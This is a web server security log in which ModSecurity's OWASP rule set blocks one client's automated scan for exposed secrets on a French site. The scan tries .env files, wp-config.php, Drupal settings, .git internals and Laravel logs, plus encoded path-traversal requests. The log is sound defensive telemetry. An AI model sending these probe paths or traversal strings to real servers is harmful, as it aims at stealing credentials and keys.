[Tue May 12 05:10:31.926343 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.246:21506] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.txt"] [unique_id "agKaJ81tk6y7yBJLpJozJwAAAI4"]
[Tue May 12 05:10:31.926526 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.246:21506] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.txt"] [unique_id "agKaJ81tk6y7yBJLpJozJwAAAI4"]
[Tue May 12 05:10:31.926798 2026] [security2:error] [pid 1825287:tid 1825323] [client 45.148.10.246:21532] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php.txt"] [unique_id "agKaJwgpmE1yW0glLdgniwAAANI"]
[Tue May 12 05:10:31.926934 2026] [security2:error] [pid 1825287:tid 1825323] [client 45.148.10.246:21532] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php.txt"] [unique_id "agKaJwgpmE1yW0glLdgniwAAANI"]
[Tue May 12 05:10:31.927129 2026] [security2:error] [pid 1825287:tid 1825323] [client 45.148.10.246:21532] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php.txt"] [unique_id "agKaJwgpmE1yW0glLdgniwAAANI"]
[Tue May 12 05:10:31.928347 2026] [security2:error] [pid 1808852:tid 1808876] [client 45.148.10.246:21468] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/app/.env"] [unique_id "agKaJxfeipD4uoG21FoqGQAAABU"]
[Tue May 12 05:10:31.928467 2026] [security2:error] [pid 1808852:tid 1808876] [client 45.148.10.246:21468] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/app/.env"] [unique_id "agKaJxfeipD4uoG21FoqGQAAABU"]
[Tue May 12 05:10:31.928655 2026] [security2:error] [pid 1808852:tid 1808876] [client 45.148.10.246:21468] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/app/.env"] [unique_id "agKaJxfeipD4uoG21FoqGQAAABU"]
[Tue May 12 05:10:31.940560 2026] [security2:error] [pid 1825287:tid 1825329] [client 45.148.10.246:21560] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/local/.env"] [unique_id "agKaJwgpmE1yW0glLdgnjAAAANc"]
[Tue May 12 05:10:31.940562 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.246:21460] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJzue9Sp-pIv_Bb69HAAAAUE"]
[Tue May 12 05:10:31.940682 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.246:21460] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJzue9Sp-pIv_Bb69HAAAAUE"]
[Tue May 12 05:10:31.940685 2026] [security2:error] [pid 1825287:tid 1825329] [client 45.148.10.246:21560] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/local/.env"] [unique_id "agKaJwgpmE1yW0glLdgnjAAAANc"]
[Tue May 12 05:10:31.940862 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.246:21460] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaJzue9Sp-pIv_Bb69HAAAAUE"]
[Tue May 12 05:10:31.940865 2026] [security2:error] [pid 1825287:tid 1825329] [client 45.148.10.246:21560] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/local/.env"] [unique_id "agKaJwgpmE1yW0glLdgnjAAAANc"]
[Tue May 12 05:10:31.941677 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/sites/default/settings.php"] [unique_id "agKaJ9r1yOh9TvizeziYvQAAAEQ"]
[Tue May 12 05:10:31.941798 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/sites/default/settings.php"] [unique_id "agKaJ9r1yOh9TvizeziYvQAAAEQ"]
[Tue May 12 05:10:31.941882 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "ixinabourgoin.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKaJxfeipD4uoG21FoqGwAAABc"]
[Tue May 12 05:10:31.941991 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/sites/default/settings.php"] [unique_id "agKaJ9r1yOh9TvizeziYvQAAAEQ"]
[Tue May 12 05:10:31.942083 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKaJxfeipD4uoG21FoqGwAAABc"]
[Tue May 12 05:10:31.942275 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKaJxfeipD4uoG21FoqGwAAABc"]
[Tue May 12 05:10:31.942725 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaJ3o6NvB9WXx5V-6nIAAAAQE"]
[Tue May 12 05:10:31.942840 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaJ3o6NvB9WXx5V-6nIAAAAQE"]
[Tue May 12 05:10:31.942983 2026] [core:error] [pid 1820198:tid 1820210] [client 45.148.10.246:21582] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 05:10:31.943032 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.246:21494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaJ3o6NvB9WXx5V-6nIAAAAQE"]
[Tue May 12 05:10:31.943063 2026] [security2:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env~"] [unique_id "agKaJwgpmE1yW0glLdgnjQAAANQ"]
[Tue May 12 05:10:31.943231 2026] [security2:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env~"] [unique_id "agKaJwgpmE1yW0glLdgnjQAAANQ"]
[Tue May 12 05:10:31.943255 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.git/index"] [unique_id "agKaJzue9Sp-pIv_Bb69HQAAAUk"]
[Tue May 12 05:10:31.943361 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.git/index"] [unique_id "agKaJzue9Sp-pIv_Bb69HQAAAUk"]
[Tue May 12 05:10:31.943446 2026] [security2:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env~"] [unique_id "agKaJwgpmE1yW0glLdgnjQAAANQ"]
[Tue May 12 05:10:31.943575 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.git/index"] [unique_id "agKaJzue9Sp-pIv_Bb69HQAAAUk"]
[Tue May 12 05:10:31.943702 2026] [core:error] [pid 1825179:tid 1825220] [client 45.148.10.246:21476] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 05:10:31.944469 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.gitignore"] [unique_id "agKaJwgpmE1yW0glLdgnjgAAANg"]
[Tue May 12 05:10:31.944581 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.gitignore"] [unique_id "agKaJwgpmE1yW0glLdgnjgAAANg"]
[Tue May 12 05:10:31.944706 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaJ3o6NvB9WXx5V-6nIQAAARY"]
[Tue May 12 05:10:31.944759 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.gitignore"] [unique_id "agKaJwgpmE1yW0glLdgnjgAAANg"]
[Tue May 12 05:10:31.944813 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaJ3o6NvB9WXx5V-6nIQAAARY"]
[Tue May 12 05:10:31.945007 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaJ3o6NvB9WXx5V-6nIQAAARY"]
[Tue May 12 05:10:31.945231 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/config/.env"] [unique_id "agKaJ9r1yOh9TvizeziYvwAAAEc"]
[Tue May 12 05:10:31.945339 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/config/.env"] [unique_id "agKaJ9r1yOh9TvizeziYvwAAAEc"]
[Tue May 12 05:10:31.945466 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.git/logs/HEAD"] [unique_id "agKaJ3o6NvB9WXx5V-6nIgAAARM"]
